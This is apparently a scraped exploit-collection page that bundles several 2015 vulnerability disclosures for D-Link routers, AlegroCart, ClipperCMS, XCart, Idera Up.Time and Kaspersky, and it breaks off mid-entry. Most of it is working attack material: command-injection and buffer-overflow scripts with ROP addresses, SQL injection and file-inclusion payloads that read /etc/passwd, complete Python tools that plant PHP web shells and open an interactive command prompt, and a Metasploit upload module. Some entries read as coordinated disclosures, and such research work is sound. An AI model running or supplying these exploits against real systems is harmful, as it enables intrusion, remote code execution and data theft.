HireHackking

## Advisory Information Title: DIR-601 Command injection in ping functionality Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DIR601 -- Wireless N150 Home Router. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 1 security issue in DIR601 firmware which allows an attacker to exploit command injection in ping functionality. The user needs to be logged in. After that any attacker on wireless LAN or if mgmt interface is exposed on Internet then an internet attacker can execute the attack. Also XSRF can be used to trick administrator to exploit it. ## Details Command injection in dir-601 ---------------------------------------------------------------------------------------------------------------------- import socket import struct # CMD_INJECTION_INPINGTEST # Just need user to be logged in and nothing else buf = "POST /my_cgi.cgi HTTP/1.0\r\n" buf+="HOST: 192.168.1.8\r\nUser-Agent: test\r\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nConnection:keep-alive\r\nAccept-Encoding:gzip,deflate,sdch\r\nAccept-Language:en-US,en;q=0.8\r\nContent-Length:101\r\n\r\n" buf+="request=ping_test&admin3_user_name=admin1;echo admin > /var/passwd1;test&admin4_user_pwd=admin2&user_type=0"+"\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("IP_ADDRESS", 80)) s.send(buf) ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley

## Advisory Information Title: DGL5500 Un-Authenticated Buffer overflow in HNAP functionality Vendors contacted: William Brown <william.brown@dlink.com>, Patrick Cline patrick.cline@dlink.com(Dlink) CVE: None Note: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061 However, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. ## Product Description DGL5500 -- Gaming Router AC1300 with StreamBoost. Mainly used by home and small offices. ## Vulnerabilities Summary Have come across 1 security issue in DGL5500 firmware which allows an attacker on wireless LAN to exploit buffer overflow vulnerabilitiy in hnap functionality. Does not require any authentication and can be exploited on WAN if the management interface is exposed. ## Details # HNAP buffer oberflow ---------------------------------------------------------------------------------------------------------------------- import socket import struct import string import sys BUFFER_SIZE = 2048 # Although you can access this URL unauthenticated on WAN connection which is great but need a good shellcode. buffer overflow in check_hnap_auth buf = "POST /hnap.cgi HTTP/1.1\r\nHOST: 10.0.0.90\r\nUser-Agent: test\r\nContent-Length: 13\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings\r\nHNAP_AUTH: test\r\nCookie: unsupportedbrowser=1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE" buf+="FFFF" buf+="AAAA" #s0 buf+="\x2A\xBF\xB9\xF4" #s1 ROP 2 buf+="\x2A\xC1\x3C\x30" #s2 sleep address buf+="DDDD" #s3 buf+="\x2A\xC0\xEB\x50" #s4 ROP 4 2AC0EB50 buf+="\x2a\xc0\xf3\xe8" # Retn address 2AC0F3E8 ROP1 buf+="XXXXFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGG" # 36 bytes of gap buf+="\x2A\xBC\xDB\xD0" # ROP 3 buf+="GGGGGGGGGGGGGGGG" buf+="AAAAAAAAAAAAAAAAAAAAA" # Needs a proper shell code Bad chars 1,0 in the first bit of hex byte so 1x or 0x buf+="GGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIIJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ\r\n\r\n"+"test=test\r\n\r\n" print "[+] sending buffer size", len(buf) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((sys.argv[1], 80)) s.send(buf) data = s.recv(BUFFER_SIZE) s.close() print "received data:", data ---------------------------------------------------------------------------------------------------------------------- ## Report Timeline * April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. * July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor * Nov 13, 2015: A public advisory is sent to security mailing lists. ## Credit This vulnerability was found by Samuel Huntley

Security Advisory - Curesec Research Team 1. Introduction Affected Product: AlegroCart 1.2.8 Fixed in: Patch AC128_fix_17102015 Path Link: http://forum.alegrocart.com/download/file.php?id=1040 Vendor Website: http://alegrocart.com/ Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 11/13/2015 Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview There is a blind SQL injection in the admin area of AlegroCart. Additionally, there is a blind SQL injection when a customer purchases a product. Because of a required interaction with PayPal, this injection is hard to exploit for an attacker. 3. BLind SQL Injection (Admin) CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description When viewing the list of uploaded files - or images - , the function check_download is called. This function performs a database query with the unsanitized name of the file. Because of this, an attacker can upload a file containing SQL code in its name, which will be executed once files are listed. Note that a similar function - check_filename - is called when deleting a file, making it likely that this operation is vulnerable as well. Admin credentials are required to exploit this issue. Proof of Concept POST /ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download&action=insert HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en; __atuvc=4%7C37 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------16690383031191084421650661794 Content-Length: 865 -----------------------------16690383031191084421650661794 Content-Disposition: form-data; name="language[1][name]" test -----------------------------16690383031191084421650661794 Content-Disposition: form-data; name="download"; filename="image.jpg' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(100000000,ENCODE('MSG','by 5 seconds')),null) -- -" Content-Type: image/jpeg img -----------------------------16690383031191084421650661794 Content-Disposition: form-data; name="mask" 11953405959037.jpg -----------------------------16690383031191084421650661794 Content-Disposition: form-data; name="remaining" 1 -----------------------------16690383031191084421650661794 Content-Disposition: form-data; name="dc8bd9802df2ba1fd321b32bf73c62c4" f396df6c76265de943be163e9b65878a -----------------------------16690383031191084421650661794-- Visiting http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/admin2/?controller=download will trigger the injected code. Code /upload/admin2/model/products/model_admin_download.php function check_download($filename){ $result = $this->database->getRow("select * from download where filename = '".$filename."'"); return $result; } function check_filename($filename){ $results = $this->database->getRows("select filename from download where filename = '" . $filename . "'"); return $results; } /upload/admin2/controller/download.php function checkFiles() { $files=glob(DIR_DOWNLOAD.'*.*'); if (!$files) { return; } foreach ($files as $file) { $pattern='/\.('.implode('|',$this->prohibited_types).')$/'; $filename=basename($file); if (!preg_match($pattern,$file) && $this->validate->strlen($filename,1,128)) { $result = $this->modelDownload->check_download($filename); if (!$result) { $this->init($filename); } } } } 4. BLind SQL Injection (Customer) CVSS Medium 5.1 AV:N/AC:L/Au:S/C:P/I:P/A:P Description There is an SQL Injection when using Paypal as a payment method during checkout. Please note that this injection requires that a successful interaction with Paypal took place. For test purposes, we commented out the parts of the code that actually perform this interaction with Paypal. Proof of Concept 1. Register a User 2. Buy an item, using PayPal as payment method; stop at step "Checkout Confirmation" 3. Visit this link to trigger the injection: http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=INJECTION. Note that this requires a valid paypal tx token. The injection can be exploited blind: http://localhost/ecommerce/AlegroCart_1.2.8-2/upload/?controller=checkout_process&method=return&tx=REQUEST_TOKEN&ref=-1' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23) However, this is rather unpractical, especially considering the need for a valid PayPal token for each request. It is also possible with this injection to inject into an UPDATE statement in update_order_status_paidunconfirmed. The problem here is that it is difficult to create an injection that exploits the UPDATE statement, but also results in an order_id being returned by the previous SELECT statement. It may also be possible to use the order_id that can be controlled via the SELECT statement to inject into the INSERT statement in update_order_history. But again, it is difficult to craft a query that does this, but also returns a valid result for the UPDATE query. Code /upload/catalog/extension/payment/paypal.php: function orderUpdate($status = 'final_order_status', $override = 0) { //Find the paid_unconfirmed status id $results = $this->getOrderStatusId('order_status_paid_unconfirmed'); $paidUnconfirmedStatusId = $results?$results:0; //Find the final order status id $results = $this->getOrderStatusId($status); $finalStatusId = $results?$results:0; $reference = $this->request->get('ref'); //Get Order Id $res = $this->modelPayment->get_order_id($reference); $order_id = $res['order_id']; //Update order only if state in paid unconfirmed OR override is set if ($order_id) { if ($override) { // Update order status $result = $this->modelPayment->update_order_status_override($finalStatusId,$reference); // Update order_history if ($result) { $this->modelPayment->update_order_history($order_id, $finalStatusId, 'override'); } } else { // Update order status only if status is currently paid_unconfirmed $result = $this->modelPayment->update_order_status_paidunconfirmed($finalStatusId, $reference, $paidUnconfirmedStatusId); // Update order_history if ($result) { $this->modelPayment->update_order_history($order_id, $finalStatusId, 'PDT/IPN'); } } } } /upload/catalog/model/payment/model_payment.php: function get_order_id($reference){ $result = $this->database->getrow("select `order_id` from `order` where `reference` = '" . $reference . "'"); return $result; } function update_order_history($order_id, $finalStatusId,$comment){ $this->database->query("insert into `order_history` set `order_id` = '" . $order_id . "', `order_status_id` = '" . $finalStatusId . "', `date_added` = now(), `notify` = '0', `comment` = '" . $comment . "'"); } function update_order_status_paidunconfirmed($finalStatusId, $reference, $paidUnconfirmedStatusId){ $result = $this->database->countAffected($this->database->query("update `order` set `order_status_id` = '" . $finalStatusId . "' where `reference` = '" . $reference . "' and order_status_id = '" . $paidUnconfirmedStatusId . "'")); return $result; } 5. Solution To mitigate this issue please apply this patch: http://forum.alegrocart.com/download/file.php?id=1040 Please note that a newer version might already be available. 6. Report Timeline 09/29/2015 Informed Vendor about Issue 17/10/2015 Vendor releases fix 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/AlegroCart-128-SQL-Injection-104.html

Security Advisory - Curesec Research Team 1. Introduction Affected Product: AlegroCart 1.2.8 Fixed in: Patch AC128_fix_22102015 Path Link: http://forum.alegrocart.com/download/file.php?id=1047 Vendor Website: http://alegrocart.com/ Vulnerability Type: LFI/RFI Remote Exploitable: Yes Reported to vendor: 09/29/2015 Disclosed to public: 11/13/2015 Release mode: Coordinated release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description CVSS Medium 6.5 AV:N/AC:L/Au:S/C:C/I:C/A:C Description When retrieving logs, there are no checks on the given file_path Parameter. Because of this, local or remote files can be included, which are then executed or printed. Admin credentials are required to view logs. 3. Proof of Concept Remote File: POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------16809437203643590021165278222 Content-Length: 441 -----------------------------16809437203643590021165278222 Content-Disposition: form-data; name="directory" error_log -----------------------------16809437203643590021165278222 Content-Disposition: form-data; name="file_path" http://localhost/shell.php -----------------------------16809437203643590021165278222 Content-Disposition: form-data; name="decrytion" 0 -----------------------------16809437203643590021165278222-- Local File: POST /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=report_logs HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: alegro=accept; admin_language=en; alegro_sid=96e1abd77b24dd6f820b82eb32f2bd04_36822a89462da91b6ad8c600a468b669; currency=CAD; catalog_language=en Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------16809437203643590021165278222 Content-Length: 425 -----------------------------16809437203643590021165278222 Content-Disposition: form-data; name="directory" error_log -----------------------------16809437203643590021165278222 Content-Disposition: form-data; name="file_path" /etc/passwd -----------------------------16809437203643590021165278222 Content-Disposition: form-data; name="decrytion" 0 -----------------------------16809437203643590021165278222-- For the patches AC128_fix_13102015 and AC128_fix_17102015 the following attack strings were still working: http://localhost/shell.php?x=ls&foo=/var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/ /var/www/ecommerce/AlegroCart_1.2.8/upload/logs/error_log/../../../../../../../etc/passwd 4. Code / upload/admin2/controller/report_logs.php function get_file(){ $file = ''; if($this->request->gethtml('file_path', 'post')){ $file = file_get_contents($this->request->gethtml('file_path', 'post')); } if($this->request->gethtml('decrytion', 'post')){ $file = $this->ccvalidation->deCrypt($file, $this->config->get('config_token')); } if($file){ $file = str_replace(array("\r\n", "\r", "\n"),'<br>', $file); } return $file; } 5. Solution To mitigate this issue please apply this patch: TODO Please note that a newer version might already be available. 6.. Report Timeline 09/29/2015 Informed Vendor about Issue 11/03/2015 Vendor releases fix 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/AlegroCart-128-LFIRFI-102.html

#!/usr/local/bin/python # Exploit for ClipperCMS 1.3.0 Code Execution vulnerability # An account is required with rights to file upload (eg a user in the Admin, Publisher, or Editor role) # The server must parse htaccess files for this exploit to work. # Curesec GmbH crt@curesec.com import sys import re import requests # requires requests lib if len(sys.argv) != 4: exit("usage: python " + sys.argv[0] + " http://example.com/ClipperCMS/ admin admin") url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] loginPath = "/manager/processors/login.processor.php" fileManagerPath = "/manager/index.php?a=31" def login(requestSession, url, username, password): postData = {"ajax": "1", "username": username, "password": password} return requestSession.post(url, data = postData, headers = {"referer": url}) def getFullPath(requestSession, url): request = requestSession.get(url, headers = {"referer": url}) if "You don't have enough privileges" in request.text: return "cant upload" fullPath = re.search("var current_path = '(.*)';", request.text) return fullPath.group(1) def upload(requestSession, url, fileName, fileContent, postData): filesData = {"userfile[0]": (fileName, fileContent)} return requestSession.post(url, files = filesData, data = postData, headers = {"referer": url}) def workingShell(url, fullPath): return fullPath.strip("/") in requests.get(url + "pwd", headers = {"referer": url}).text.strip("/") def runShell(url): print("enter command, or enter exit to quit.") command = raw_input("$ ") while "exit" not in command: print(requests.get(url + command).text) command = raw_input("$ ") requestSession = requests.session() loginResult = login(requestSession, url + loginPath, username, password) if "Incorrect username" in loginResult.text: exit("ERROR: Incorrect username or password") else: print("successful: login as " + username) fullPath = getFullPath(requestSession, url + fileManagerPath) if fullPath == "cant upload": exit("ERROR: user does not have required privileges") else: print("successful: user is allowed to use file manager. Full path: " + fullPath) uploadResult = upload(requestSession, url + fileManagerPath, ".htaccess", "AddType application/x-httpd-php .png", {"path": fullPath}) if "File uploaded successfully" not in uploadResult.text: exit("ERROR: could not upload .htaccess file") else: print("successful: .htaccess upload") uploadResult = upload(requestSession, url + fileManagerPath, "404.png", "<?php passthru($_GET['x']) ?>", {"path": fullPath}) if "File uploaded successfully" not in uploadResult.text: exit("ERROR: could not upload shell") else: print("successful: shell upload. Execute commands via " + url + "404.png?x=<COMMAND>") if workingShell(url + "404.png?x=", fullPath): print("successful: shell seems to be working") else: exit("ERROR: shell does not seem to be working correctly") runShell(url + "404.png?x=") #Blog Reference: #http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-Exploit-96.html

Security Advisory - Curesec Research Team 1. Introduction Affected Product: ClipperCMS 1.3.0 Fixed in: not fixed Fixed Version Link: n/a Vendor Website: http://www.clippercms.com/ Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 10/02/2015 Disclosed to public: 11/13/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview There are multiple SQL Injection vulnerabilities in ClipperCMS 1.3.0. An account with the role "Publisher" or "Administrator" is needed to exploit each of these vulnerabilities. 3. SQL Injection 1 (Blind) CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description The id parameter of the web user editor is vulnerable to blind SQL Injection. To exploit this issue, an account is needed that has the right to manage web users. Users with the role "Publisher" or "Administrator" have this by default. Proof of Concept http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23 -> true http://localhost//ClipperCMS-clipper_1.3.0/manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='4',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23 -> false Code /manager/actions/mutate_web_user.dynamic.php $sql = "SELECT * FROM $dbase.`".$table_prefix."web_groups` where webuser=".$_GET['id'].""; 4. SQL Injection 2 CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description When updating a user, the newusername parameter is vulnerable to SQL injection. To exploit this issue, an account is needed that has the right to manage web users. Users with the role "Publisher" or "Administrator" have this by default. Proof of Concept POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1 mode=12&id=3&blockedmode=0&stay=&oldusername=testtest &newusername=testtest' or extractvalue(1,concat(0x7e,(SELECT concat(user) FROM mysql.user limit 0,1))) -- - &newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo3%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob=&gender=&comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query Code /manager/processors/save_user_processor.php $sql = "UPDATE " . $modx->getFullTableName('manager_users') . " SET username='$newusername'" . $updatepasswordsql . " WHERE id=$id"; 5. SQL Injection 3 CVSS Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description When updating a user, the country, role, blocked, blockeduntil, blockedafter, failedlogincount, and gender parameter are vulnerable to SQL injection. To exploit this issue, an account is needed that has the right to manage web users. Users with the role "Publisher" or "Administrator" have this by default. Proof of Concept The proof of concepts for the country, role, blocked, blockeduntil, failedlogincount, and blockedafter parameter are analog to this POC for gender: POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1 mode=12&id=3&blockedmode=0&stay=&oldusername=testtest&newusername=testtest&newpassword=0&passwordgenmethod=g&specifiedpassword=&confirmpassword=&passwordnotifymethod=s&fullname=&email=foo6%40example.com&oldemail=foo3%40example.com&role=2&phone=&mobilephone=&fax=&state=&zip=&country=&dob= &gender=2', fax=(SELECT concat(user) FROM mysql.user limit 0,1), dob='0 &comment=&failedlogincount=0&blocked=0&blockeduntil=&blockedafter=&manager_language=english&manager_login_startup=&allow_manager_access=1&allowed_ip=&manager_theme=&filemanager_path=&upload_images=&default_upload_images=1&upload_media=&default_upload_media=1&upload_flash=&default_upload_flash=1&upload_files=&default_upload_files=1&upload_maxsize=&which_editor=&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_editor_theme=&tinymce_custom_plugins=&tinymce_custom_buttons1=&tinymce_custom_buttons2=&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&photo=&save=Submit+Query Visiting the overview page of that user will show the result of the injected query. Code /manager/processors/save_user_processor.php $sql = "UPDATE " . $modx->getFullTableName('user_attributes') . " SET fullname='$fullname', role='$roleid', email='$email', phone='$phone', mobilephone='$mobilephone', fax='$fax', zip='$zip', state='$state', country='$country', gender='$gender', dob='$dob', photo='$photo', comment='$comment', failedlogincount='$failedlogincount', blocked=$blocked, blockeduntil=$blockeduntil, blockedafter=$blockedafter WHERE internalKey=$id"; 6. Solution This issue has not been fixed by the vendor. 7. Report Timeline 10/02/2015 Informed Vendor about Issue (no reply) 10/21/2015 Reminded Vendor of Disclosure Date (no reply) 11/13/2015 Disclosed to public Blog Reference: http://blog.curesec.com/article/blog/ClipperCMS-130-SQL-Injection-99.html

#!/usr/local/bin/python # Exploit for XCart 5.2.6 Code Execution vulnerability # An admin account is required to use this exploit # Curesec GmbH import sys import re import requests # requires requests lib if len(sys.argv) != 4: exit("usage: python " + sys.argv[0] + " http://example.com/xcart/ admin@example.com admin") url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] loginPath = "/admin.php?target=login" fileManagerPath = "/admin.php?target=logo_favicon" shellFileName = "404.php" shellContent = "GIF89a;<?php passthru($_GET['x']); ?>" def login(requestSession, url, username, password): csrfRequest = requestSession.get(url) csrfTokenRegEx = re.search('name="xcart_form_id" type="hidden" value="(.*)" class', csrfRequest.text) csrfToken = csrfTokenRegEx.group(1) postData = {"target": "login", "action": "login", "xcart_form_id": csrfToken, "login": username, "password": password} loginResult = requestSession.post(url, data = postData).text return "Invalid login or password" not in loginResult def upload(requestSession, url, fileName, fileContent): csrfRequest = requestSession.get(url) csrfTokenRegEx = re.search('SimpleCMS" />\n<input type="hidden" name="xcart_form_id" value="(.*)" />', csrfRequest.text) csrfToken = csrfTokenRegEx.group(1) filesData = {"logo": (fileName, fileContent)} postData = {"target": "logo_favicon", "action": "update", "page": "CDev\SimpleCMS", "xcart_form_id": csrfToken} uploadResult = requestSession.post(url, files = filesData, data = postData) return "The data has been saved successfully" in uploadResult.text def runShell(url): print("enter command, or enter exit to quit.") command = raw_input("$ ") while "exit" not in command: print(requests.get(url + command).text.replace("GIF89a;", "")) command = raw_input("$ ") requestSession = requests.session() if login(requestSession, url + loginPath, username, password): print("successful: login") else: exit("ERROR: Incorrect username or password") if upload(requestSession, url + fileManagerPath, shellFileName, shellContent): print("successful: file uploaded") else: exit("ERROR: could not upload file") runShell(url + shellFileName + "?x=") Blog Reference: http://blog.curesec.com/article/blog/XCart-526-Code-Execution-Exploit-87.html

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::PhpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'Idera Up.Time Monitoring Station 7.0 post2file.php Arbitrary File Upload', 'Description' => %q{ This module exploits an arbitrary file upload vulnerability found within the Up.Time monitoring server 7.2 and below. A malicious entity can upload a PHP file into the webroot without authentication, leading to arbitrary code execution. Although the vendor fixed Up.Time to prevent this vulnerability, it was not properly mitigated. To exploit against a newer version of Up.Time (such as 7.4), please use exploits/multi/http/uptime_file_upload_2. }, 'Author' => [ 'Denis Andzakovic <denis.andzakovic[at]security-assessment.com>' # Vulnerability discoverey and MSF module ], 'License' => MSF_LICENSE, 'References' => [ [ 'OSVDB', '100423' ], [ 'BID', '64031'], [ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Up.Time%207.2%20-%20Arbitrary%20File%20Upload.pdf' ] ], 'Payload' => { 'Space' => 10000, # just a big enough number to fit any PHP payload 'DisableNops' => true }, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [ [ 'Up.Time 7.0/7.2', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 19 2013')) register_options([ OptString.new('TARGETURI', [true, 'The full URI path to the Up.Time instance', '/']), Opt::RPORT(9999) ], self.class) end def check uri = target_uri.path res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'wizards', 'post2file.php') }) if res and res.code == 500 and res.body.to_s =~ /<title><\/title>/ return Exploit::CheckCode::Appears end return Exploit::CheckCode::Safe end def exploit print_status("#{peer} - Uploading PHP to Up.Time server") uri = target_uri.path @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self => true) post_data = ({ "file_name" => @payload_name, "script" => php_payload }) print_status("#{peer} - Uploading payload #{@payload_name}") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'wizards', 'post2file.php'), 'vars_post' => post_data, }) unless res and res.code == 200 and res.body.to_s =~ /<title><\/title>/ fail_with(Failure::UnexpectedReply, "#{peer} - Upload failed") end print_status("#{peer} - Executing payload #{@payload_name}") res = send_request_cgi({ 'uri' => normalize_uri(uri, 'wizards', @payload_name), 'method' => 'GET' }) end end

Source: https://code.google.com/p/google-security-research/issues/detail?id=529 The attached testcase was found by fuzzing DEX files, and results in a heap overflow with a wild memcpy. Note that Kaspersky catch exceptions and continue execution, so running into unmapped pages doesn't terminate the process, this should make exploitation quite realistic. (bb8.ac0): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0c0b2074 ebx=ffffffff ecx=3ffd419c edx=00000003 esi=0c161a01 edi=0c170000 eip=72165157 esp=046ceed8 ebp=046ceee0 iopl=0 nv up ei pl nz na po nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 avengine_dll!ekaGetObjectFactory+0x51537: 72165157 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] 0:023> dd edi 0c170000 ???????? ???????? ???????? ???????? 0c170010 ???????? ???????? ???????? ???????? 0c170020 ???????? ???????? ???????? ???????? 0c170030 ???????? ???????? ???????? ???????? 0c170040 ???????? ???????? ???????? ???????? 0c170050 ???????? ???????? ???????? ???????? 0c170060 ???????? ???????? ???????? ???????? 0c170070 ???????? ???????? ???????? ???????? 0:023> dd esi 0c161a01 00000000 00000000 00000000 00000000 0c161a11 00000000 00000000 00000000 00000000 0c161a21 00000000 00000000 00000000 00000000 0c161a31 00000000 00000000 00000000 00000000 0c161a41 00000000 00000000 00000000 00000000 0c161a51 00000000 00000000 00000000 00000000 0c161a61 00000000 00000000 00000000 00000000 0c161a71 00000000 00000000 00000000 00000000 0:023> kvn1 # ChildEBP RetAddr Args to Child 00 046ceee0 15c01af7 0c0c0674 0c0b2075 ffffffff avengine_dll!ekaGetObjectFactory+0x51537 This vulnerability is exploitable for remote code execution as NT AUTHORITY\SYSTEM. Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38735.zip

Source: https://code.google.com/p/google-security-research/issues/detail?id=539 When Kaspersky https inspection is enabled, temporary certificates are created in %PROGRAMDATA% for validation. I observed that the naming pattern is {CN}.cer. I created a certificate with CN="../../../../Users/All Users/Start Menu/Startup/foo.bat\x00", browsed to an SSL server presenting that certificate and Kaspersky created that certificate name. Jumping from this to code execution seems quite straightforward. I didn't try it, but it seems quite easy to make some ASN.1/X.509 that is also a valid batch file or some other relaxed-parsing format. Here is how to generate a certificate to reproduce: $ openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 360 Generating a 2048 bit RSA private key ......................................................................+++ ...............+++ writing new private key to 'key.pem' Enter PEM pass phrase: Verifying - Enter PEM pass phrase: ----- You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]: State or Province Name (full name) [Some-State]: Locality Name (eg, city) []: Organization Name (eg, company) [Internet Widgits 